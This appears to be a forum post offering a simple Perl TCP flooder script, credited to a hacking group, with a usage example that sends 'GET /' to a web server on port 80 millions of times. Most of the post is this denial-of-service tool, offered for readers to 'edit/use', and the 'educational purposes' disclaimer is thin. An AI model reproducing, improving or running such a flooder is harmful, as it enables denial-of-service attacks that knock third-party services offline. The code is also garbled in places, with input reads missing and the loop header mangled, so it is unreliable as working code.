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perl udp.pl

tcp flooder

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#!/usr/bin/perl use IO::Socket;print q

{__________ ____ _____ |____ ____|/

___||_ | | | / / | __| | |

( \___ | | |__| \_____||__| _________

__ _ \_ _____/| | ____ ____ __| | | __)

| | / _ \ / _ \ / __ | | | | |_( | ) /_/ |

\___| |____/\____/ \____/\_____|

with data sending.

Made By ZeN DU Security Group Coderz };

print "Host : "; $serv = ; chop ($serv); print "Port : "; $port = ; chop ($port);

print "Data :"; $data = ; chop($data); print "Times To Flood : "; $times = ; chop ($times);

for ($i=0; $inew( Proto => "tcp", PeerAddr => "$serv", PeerPort => "$port") || print "[*] Server Down!\n"; print $flood $data; syswrite STDOUT, "[*] Flooding - ".$i."\n"; } print "[*] End of flood.\n";

Here is a very basic perl script for sending data to a server over and over again. Here is a basic usuage example >

Host : www.site.com Post : 80 Data : GET / Times to Flood : 9999999

The script will send the data to specified host over and over again in a loop until it reaches the value of the $times variable, which is set when by you at prompt 'Times to Flood'. Scripts such as these are used everyday in DoS & DDoS attacks (Denial of Service), on its own this script will have little to no impact on any half decent server. I made this script, along with a selection of others as a part of a project im working on currently Wink. While I do not condone attacks of this type, feel free to edit/use this example in however way you wish. THIS IS FOR EDUCATIONAL PURPOSES ONLY!!!

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